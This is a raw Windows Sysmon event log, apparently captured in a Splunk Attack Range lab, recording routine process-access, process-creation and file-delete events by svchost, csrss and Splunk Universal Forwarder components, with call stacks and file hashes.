11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-150E-6216-C704-000000003902}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-150E-6216-C704-000000003902}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.053{4F8D34B0-150E-6216-C704-000000003902}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:51.873{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5A7F642ECBAAAE01FEA3FE73DD51C56,SHA256=368BE7304861B524096EEDC277053267D5C48843AE61600D300C5EB8E38D5CAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.458{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A3C21234B350554B63E14794556A97B,SHA256=0A5941F180EFA759DD3EEF3649DB166EB480AC772DBAE2BB0C396D673E95DECD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-150F-6216-C804-000000003902}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-150F-6216-C804-000000003902}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.224{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-150F-6216-C804-000000003902}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:51.225{4F8D34B0-150F-6216-C804-000000003902}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:52.888{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFB96E2A2AC432C2ADFFA8CAB7BE58E0,SHA256=18705CA37249C4EE9B2BEC6EA883CA09ECACBCED2733DA4EF7F11F689906A427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:52.505{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C188F6A113BD72C0DA36BD7AD9A432B3,SHA256=3D3D5730261A80ED04A36A4054E412347AD6CDC19404A14D16A6F7C22DCFFFA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 